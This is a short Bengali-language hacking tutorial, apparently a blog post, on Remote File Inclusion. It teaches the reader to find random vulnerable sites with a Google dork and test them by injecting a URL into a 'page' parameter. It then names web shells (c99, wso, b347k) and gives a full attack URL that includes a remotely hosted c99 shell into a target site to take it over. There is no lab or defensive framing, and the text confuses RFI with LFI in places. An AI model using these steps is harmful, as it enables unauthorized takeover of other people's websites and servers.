Remote File Inclusion হলো বর্তমান সময়ের জনপ্রিয় হ্যাকিং পদ্ধতি গুলোর মধ্যে একটি।
যা ওয়েব এপ্লিকেশনে পাওয়া যায়।
এই ধরনের দুর্বলতাকে ব্যাবহার করে হ্যাকার দুর্বল সাইটটির সার্ভারে ফাইল এড/যোগ করতে পারে।
যদি হ্যাকার সফল ভাবে এই কাজটি করতে সক্ষম হয় তাহলে সে সেই দুর্বল সাইটটি কে হ্যাক করতে পারবে।
এবং তার সাথে সাথে সার্ভারটি ও হ্যাক করা সম্ভব।
সাধারনত এই টাইপের দুর্বলতা গুলো এই ধরনের সাইটে থাকে যেই সাইট গুলোর লিঙ্ক গুলো এরকম হয়।
উদাহারণঃ http://www.Targetsite.com/index.?page=index.
এই দুর্বলতাটি তে দুর্বল সাইট বের করার জন্যে সবচেয়ে বেশী কার্যকর google dork হচ্ছে
“inurl:index.?page=”
এই Dork টি index.?page ইউআরএলের যত সাইট আছে সব গুলো আপনাকে রেসাল্টে দেখাবে।
যেকোনো একটি সাইটে প্রবেশ করুন এবং সাইটটি দুর্বল নাকি চেক করার জন্যে
?page= এর পর www.google.com এড করে এন্টার চাপুন।
উদাহারণঃ www.targetsite.com/index.?page=www.google.com
যদি মনে করেন ওয়েবসাইট টি হয় http://example.com/v2/index.?page=index.
তাহলে কোড দেওয়ার পর লিঙ্কটি হবে এরকমঃ
http://www.example.com/v2/index.?page=http://google.com/
যদি সাইটটি এখন গুগলে রিডাইরেক্ট করে।
মানে যদি আপনি এই লিঙ্কে যাওয়ার পর দেখতে পান যে গুগল দেখা যাচ্ছে তাহলে সাইট টি দুর্বল।
যদি না আসে।। তাহলে আরেকটি সাইট খুজে বের করেন!
এরপরে।। এখন কাজ হলো হ্যাকিং শেল আপলোড দেওয়া।
শেল ডাউনলোড করার জন্যে গুগল করতে পারেন।
(madspot -shell download)(wso -shell download)
(b347k -shell download)
Etc…
যায় হোক LFI এর জন্যে আমাদের শেল ডাউনলোড করা লাগবে না।
শেল আপলোড করা আছে এমন কোনো হোস্টিং থাকলেয় চলবে
সেটার জন্যে গুগলে সার্চ করুন।
c99 -shell.txt
http://www.c99txt.net/s/c99.txt (শেল লিঙ্ক)
এখন শেল আপলোড করার জন্যে লিঙ্কটি হবে।
http://www.vuln.rfisite.com/v2/index.?page=http://www.c99txt.net/s/c99.txt
ধন্যবাদ আশা করি সবাই বুঝতে পেরেছেন।
Read More